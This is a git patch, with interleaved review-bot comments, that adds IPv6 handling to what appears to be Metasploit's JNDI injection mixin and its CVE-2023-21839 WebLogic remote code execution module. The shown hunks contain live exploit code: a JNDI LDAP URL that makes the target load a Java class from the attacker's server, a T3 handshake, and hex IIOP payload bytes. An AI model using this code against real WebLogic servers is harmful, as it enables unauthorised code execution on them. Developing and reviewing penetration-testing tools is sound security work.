From 694c1006e41d90812f11c387fadc3707c8356521 Mon Sep 17 00:00:00 2001
From: Grant Willcox
Date: Fri, 9 Jun 2023 12:24:35 -0500
Subject: [PATCH] Add more IPv6 support in to the module

---
 Gemfile.lock | 2 +-
 lib/msf/core/exploit/remote/jndi_injection.rb | 2 +-
 .../multi/iiop/cve_2023_21839_weblogic_rce.rb | 21 ++++++++-----------
 3 files changed, 11 insertions(+), 14 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index e7dfd60835..6acb2795da 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -384,7 +384,7 @@ GEM
 metasm
 rex-core
 rex-text
- rex-socket (0.1.51)
+ rex-socket (0.1.52)
 rex-core
 rex-sslscan (0.1.9)
 rex-core
diff --git a/lib/msf/core/exploit/remote/jndi_injection.rb b/lib/msf/core/exploit/remote/jndi_injection.rb
index 468b9c5276..843cac6829 100644
--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -29,7 +29,7 @@ module Exploit::Remote::JndiInjection
 # @return [String] the JNDI string
 def jndi_string(resource = nil)
 resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
- "ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
+ "ldap://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{resource}"
 end
 
 ## LDAP service callbacks
diff --git a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
index 5b93099b92..a3307eca39 100644
--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
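Review bot: `jndi_string` still emits whatever `SRVHOST` holds, so a wildcard bind address (0.0.0.0 or ::, which `to_authority` will bracket just as readily) ends up in a URL the target cannot reach; the `exploit` hunk in cve_2023_21839_weblogic_rce.rb adds a routability check, but only for that one module, and `ldap_url_string` in the same file has the same gap. Consider putting the check in the mixin, or at least adding `# @note SRVHOST must be reachable from the target; a wildcard bind address is not rewritten here.` above this method so every JNDI module inherits the warning. The lock bumps rex-socket to 0.1.52, which presumably is what provides `Rex::Socket.to_authority`; the gem's minimum version constraint is not in this diff, so confirm it is raised as well or an install resolving the older rex-socket will fail with NoMethodError on this line.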
@@ -299,7 +299,7 @@ class MetasploitModule < Msf::Exploit::Remote
 # Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
 # this URL when it tries to fetch the class to be loaded and instantiated.
 def ldap_url_string
- "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}/"
+ "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['HTTP_SRVPORT'])}/"
 end
 
 #
@@ -334,14 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
 netloc = opts['ServerHost'] || bindhost
 http_srvport = (opts['ServerPort'] || bindport).to_i
 
- if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
- if Rex::Socket.is_ipv6?(netloc)
- netloc = "[#{netloc}]:#{http_srvport}"
- else
- netloc = "#{netloc}:#{http_srvport}"
- end
- end
- print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")
+ print_status("Serving Java code on: #{proto}://#{Rex::Socket.to_authority(netloc, http_srvport)}#{uopts['Path']}")
 
 # Add path to resource
 @service_path = uopts['Path']
@@ -404,6 +397,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
 # Main Exploit
 def exploit
+ if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+ fail_with(Failure::BadConfig, 'SRVHOST must be set to a routable address!')
+ end
+
 if @version.blank?
 @version = get_weblogic_version
 end
@@ -411,7 +408,7 @@ class MetasploitModule < Msf::Exploit::Remote
 # Step 1 - Make T3 connection to start IIOP connection process, and read response.
 socket = connect
 print_status('1. Making T3 connection...')
- socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
+ socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}\n\n")
 _buf = socket.get
 disconnect
 print_good('Made T3 connection!')
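Review bot: The rewritten `print_status` in the `-334` hunk reports `netloc`, which is taken from `opts['ServerHost']` when present, and that override is not covered by the `SRVHOST` guard added in `exploit` further down, so a wildcard or otherwise unreachable address can still be advertised from here; if callers can set it, validate `netloc` the same way, otherwise document that only `SRVHOST` is checked. Dropping the old branch also means the scheme-default port (80/443) is now always printed; that looks intentional, since `to_authority` is what handles the IPv6 bracketing the branch used to do, but a one-line comment such as `# to_authority brackets IPv6 hosts; the port is always shown here` would stop someone re-adding the old special case. The enclosing method starts and ends outside the hunk.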
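Review bot: The new guard in `exploit` only rejects the all-zeros address (0.0.0.0 or ::), so a loopback or link-local `SRVHOST`, which is just as unreachable from a remote WebLogic host, passes while the message claims the address is now routable; either narrow the message to what is actually checked, e.g. `fail_with(Failure::BadConfig, "SRVHOST is #{datastore['SRVHOST']}; set it to an address the target can reach, not the wildcard")`, or extend the check. A hostname `SRVHOST` is skipped entirely because `is_ip_addr?` is false for it, which seems fine but deserves a short comment on the `if` line. Failing before `get_weblogic_version` runs is the right place for this since the wildcard is commonly the server mixin's default; the `opts['ServerHost']` path in the `-334` hunk is still uncovered.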
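Review bot: The T3 `PU:` header in the `-411` hunk now carries a bracketed IPv6 literal whenever `RHOST` is IPv6, and nothing in the diff shows WebLogic accepting `t3://[addr]:port` in that handshake line, so this path should be exercised against an IPv6 listener before the subject's IPv6 claim is relied on; a comment such as `# to_authority brackets IPv6 literals; verified against WebLogic <tested version> over IPv6` (placeholder to be filled in) would record that. Style-wise the module already uses `bindhost`/`bindport` in this diff, so `rhost`/`rport` would read consistently in place of `datastore['RHOST']`/`datastore['RPORT']` with the same result for a single target. The `exploit` method continues past the hunk.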
@@ -490,7 +487,7 @@ class MetasploitModule < Msf::Exploit::Remote
 key1 = locate_buf[foff...foff + 8]
 key2 = "\xff\xff\xff\xff" + locate_buf[foff + 4...foff + 8]
 
- if @version.between?(Rex::Version.new('12.0.0.0.0'), Rex::Version.new('12.9999999.999999.999999.99999'))
+ if @version >= Rex::Version.new('12') && @version < Rex::Version.new('13')
 wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49" \
 "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
 "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x02\x38\x00\x00\x00\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
@@ -499,7 +496,7 @@ class MetasploitModule < Msf::Exploit::Remote
 "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
 "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x04{{key3}}\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
 "\x00\x00\x00\x00\x00\x00\x00{{key1}}"
- elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
+ elsif @version >= Rex::Version.new('14') && @version < Rex::Version.new('15')
 wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64" \
 "\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49\x44\x4c\x3a\x77\x65\x62\x6c" \
 "\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d" \
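Review bot: The rewritten major-version tests in the `-490` and `-499` hunks repeat the same `>= N && < N+1` shape with four `Rex::Version.new` calls per pass; if `Rex::Version` is the `Gem::Version` subclass I take it to be, `case @version.segments.first` / `when 12` / `when 14` states the intent (major 12 versus major 14) directly and drops the bound arithmetic. The new comparisons are correct as written, since `Gem::Version` ordering places `12.2.1.4.0` between `12` and `13` and trailing-zero canonicalisation makes `12.0.0.0.0 >= 12` true, but that relies on knowledge the old explicit `between?` bounds carried on their face, so a comment like `# major-version match; Rex::Version compares segment-wise` on the `if` line is worth adding. The `if`/`elsif` chain and its enclosing method continue outside the hunk, so whatever handles other majors is not visible here.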